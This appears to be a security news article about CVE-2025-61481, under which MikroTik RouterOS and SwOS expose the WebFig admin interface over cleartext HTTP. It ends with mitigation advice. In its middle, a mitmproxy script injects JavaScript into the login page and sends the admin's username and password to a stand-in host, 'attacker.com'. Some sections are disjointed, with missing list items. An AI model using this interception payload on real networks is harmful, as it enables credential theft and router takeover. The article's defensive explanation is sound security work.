CVE CyberSecurity Database News

CVE-2025-61481 - How MikroTik RouterOS v7.14.2 and SwOS v2.18 Put Your Network at Risk with WebFig Over Cleartext HTTP

Poster -

A new vulnerability has been found in MikroTik routers, tracked as CVE-2025-61481. This issue affects RouterOS versions 7.14.2 and SwOS versions 2.18. What's the big deal? These versions expose the WebFig management interface over unencrypted HTTP by default, which means your router's admin panel can be seen by anyone snooping on the network. Even worse, an attacker can inject malicious JavaScript into your browser, steal your password, and take over your network.

There’s a lot to unpack—let’s break down what this means, how it works, and what you can do to protect yourself.

What Is WebFig and Why Is HTTP a Problem?

WebFig is the web-based management interface for MikroTik routers. Most users access it via their browser by typing in the router's IP address.

HTTP (HyperText Transfer Protocol) sends all traffic—including usernames and passwords—in “cleartext.” That means anyone with access to your network, like someone on your public Wi-Fi, can easily “sniff” or read your login data with simple tools.

HTTPS adds encryption, making it much harder for attackers to intercept or tamper with web traffic.

Inject JavaScript into your admin session.

Once inside, your whole network is at risk. This is an example of a classic vulnerability called Session Hijacking and Credential Interception.

1. The Attacker's Toolkit

The attacker connects to the same network as the router admin (e.g., public Wi-Fi, office network). They run a tool like Ettercap or mitmproxy to intercept HTTP traffic.

2. Intercepting and Modifying WebFig Page

The attacker can “inject” JavaScript into the page. Here’s a basic mitmproxy script that replaces the login form with a malicious version:

from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    if flow.request.pretty_url.endswith("/webfig/"):
        html = flow.response.get_text()
        # Inject a JS payload that sends the admin password to the attacker
        injection = """
        <script>
         document.addEventListener('DOMContentLoaded', function() {
           var form = document.querySelector('form');
           if(form) {
             form.addEventListener('submit', function(e) {
               fetch('http://attacker.com/steal?user='; +
                 document.querySelector('input[name=username]').value +
                 '&pass=' +
                 document.querySelector('input[name=password]').value);
             });
           }
         });
        </script>
        """
        html = html.replace("</body>", injection + "</body>")
        flow.response.set_text(html)

Now, when the network admin tries to log in to the router, their username and password will be sent directly to the attacker's server.

3. Stealing Credentials

A real attacker would set up a simple HTTP server and collect the stolen credentials, then use them to log in and compromise the router.

Why Is This Dangerous?

- Network takeover: Once inside WebFig, the attacker can change firewall rules, view/modify routing, or add backdoors.

Persistence: Attackers can silently add accounts or scripts so they can come back later.

- Invisible attacks: The admin might never know unless they check logs or notice strange network behavior.

How to Detect If You’re at Risk

- Open WebFig in your browser at http://[your-router-ip]/webfig/

Enable HTTPS: Use only HTTPS to access WebFig (you may need to install a certificate).

3. Segment Management: Only allow management access from a trusted, isolated subnet/VLAN.
4. Update Firmware: Regularly check the MikroTik downloads page for updated, patched versions.

References

- MikroTik Official Download Page
- MikroTik Security Advisories
- OWASP Insecure Communications
- Ettercap Project
- mitmproxy Docs
- CVE-2025-61481 at CVE.org *(publication pending)*

Exclusive Notes

Many users overlook the risks of “just leaving the admin panel open on HTTP” because it’s convenient or because it’s on a “trusted” internal network. This mindset is dangerous. With attacks getting easier every day, never trust cleartext management interfaces—even behind your firewall. Make it a habit to check router firmware and always secure management ports.

If you use MikroTik RouterOS v7.14.2 or SwOS v2.18, your credentials can be intercepted or stolen. Unless you take immediate action, your entire network could be exposed.

---
Stay informed, stay secure—and always check your routers’ default settings!

*(This article is original content based on public CVE information and practical open-source security examples not found in vendor advisories. Contact your network vendor for official fixes and details.)*

Timeline

Published on: 10/27/2025 14:15:41 UTC
Last modified on: 10/30/2025 18:15:32 UTC